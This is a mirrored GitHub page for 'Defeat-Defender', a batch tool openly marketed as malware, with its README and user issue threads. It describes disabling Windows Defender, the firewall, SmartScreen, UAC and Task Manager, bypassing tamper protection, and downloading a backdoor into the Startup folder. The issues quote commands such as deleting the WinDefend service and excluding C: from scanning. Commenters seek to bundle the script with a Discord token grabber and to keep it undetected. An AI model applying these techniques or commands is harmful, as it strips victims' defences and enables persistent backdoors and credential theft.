GithubHelp home page GithubHelp logo

swagkarna / defeat-defender-v1.2.0 Goto Github PK

View Code? Open in Web Editor NEW
1.4K 43.0 300.0 18.82 MB

Powerful batch script to dismantle complete windows defender protection and even bypass tamper protection ..Disable Windows-Defender Permanently....Hack windows. POC

License: GNU General Public License v3.0

Batchfile 45.88% AutoHotkey 25.24% Python 28.88%
bypass defender antivirus fud malware payload malware-dropper bypass-antivirus undetectable av-evasion

defeat-defender-v1.2.0's Introduction

Defeat-Defender-1.2


  • If you like the tool and for my personal motivation so as to develop other tools please leave a +1 star

Powerfull Batch File To Disable Windows Defender,Firewall,Smartscreen And Execute the payload

Usage :

  • Run run.bat and enter the direct link of your malware
  • Run the script "Defeat-Defender.bat" . It will ask for Admin Permission.If permission Granted The script will work Silently and dismantle all protection...

After it got admin permission it will disable defender

  • PUAProtection
  • Automatic Sample Submission
  • Windows FireWall
  • Windows Smart Screen(Permanently)
  • Disable Quickscan
  • Add exe file to exclusions in defender settings
  • Disable Defender Notification (Added Recently)
  • Disable UAC(Reboot Required)
  • Disable Ransomware Protection
  • Disable TaskManager
  • Disable registry etc..

Proof-Of-Concept

defeat-defender_W89Khs8L_TvOB.mp4

Bypasssing Windows-Defender Techniques :

Recently Windows Introduced new Feature called "Tamper Protection".Which Prevents the disable of real-time protection and modifying defender registry keys using powershell or cmd...If you need to disable real-time protection you need to do manually....But We will disable Real Time Protection using NSudo without trigerring Windows Defender


Running Defeat-Defender Script

Tested on Windows 11 Pro


After Reboot


Warning

This Script will completely Disable Windefend Services . And also it is very difficult to revert the changes..Think twice before you run the script


Behind The Scenes :

When Batch file is executed it ask for admin permissions.After getting admin privileage it starts to disable windows defender real time protectin , firewall , smartscreen and starts downloading our backdoor from server and it will placed in startup folder.The backdoor will be executed after it has downloaded from server..And will be started whenever system starts..


Check out this article :

https://secnhack.in/create-fud-fully-undetectable-payload-for-windows-10/


Note :

If you want to enable Defender Smart Screen.Use Smart Screen.bat file..


Discalimer :

Use this only for educational Purpose...Love you Guys Bye.....


Contact :


Inspired From TechChip


Special thanks to Jeffrey-d-howard(Senior Vulnerability Management Lead) For Posting Defeat-Defender on his linked page


❤️Supporters❤️

Stargazers repo roster for @swagkarna/Defeat-Defender-V1.2.0

Forkers repo roster for @swagkarna/Defeat-Defender-V1.2.0


defeat-defender-v1.2.0's People

Contributors

alimilani avatar imgbotapp avatar swagkarna avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

defeat-defender-v1.2.0's Issues

The bat does not work

When copying the link, the bat is closed, if you do it manually, the bat writes an error and does not download the file

sc delete windefend - End of this :)

Hi,

NSudo -U:T -ShowWindowMode:Hide sc delete windefend
sc delete windefend - Defender started to pick it up(Detecting) from today and doesn't allow to run in CMD nor in powershell. IF you open Nsudo Visual interface and run command - all ok and defender will be turned off but from CMD no luck anymore... :-(

Question Read below

Hello currently im making a batch grabeer, since baums is patched and somali is obfuscator too..

i was wondering if i could use ths script with credits providen ofc.
if you do not accept it lmk, thanks.
also reason is simple, its FUD but why not to disable it also its cuz im lazy to write one..

Not Working as Intended.

App Wont Disable Windows On Restart Nor Download the desired file. Tested on windows 11 Pro and Windows 10 pro Latest versions

Interesting project, would like to ask if we can use it.

Hi!

I saw that you have starred our advanced Discord Token Grabber called Rose-Injector.

We are currently looking for a good script that fully allows to disable or remove Windows Defender, because our current powershell script is not really good.

For these reasons, I would like to ask for your honest opinion on whether your program could be integrated into our project. If so, I'd like to ask if we can use your scripts.

Very good repo.

Any suggestions how to make this file fud longer? Ofc people SHOULD NOT scan it with virustotal, etc.

Thanks for this repo, works great

Nsudo file modified

why Nsudo file provided in the script is modified?
the app is for 2018 and is modified in 2023 april

Fix line: 73

Line 73 in file: Defeat-Defender.bat

should be changed to

cd "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

instead of

cd "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup^M

Command problem

Hello, I would like to know if there is a solution to reverse the command "powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:" ?, thank you

It's dont work

I need to switch off the defender.

I run the defeat-defender.bat in admin rights, turned off only cloud protection and automatic sending of samples.
But I need to turn off real time protection and tamper protection.

Maybe I'm doing something wrong?

изображение_2021-09-19_145420

This script is no longet FUD

when i try to run "defeat_defender" defender detected this script and deleted it, kindly provide the solution

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.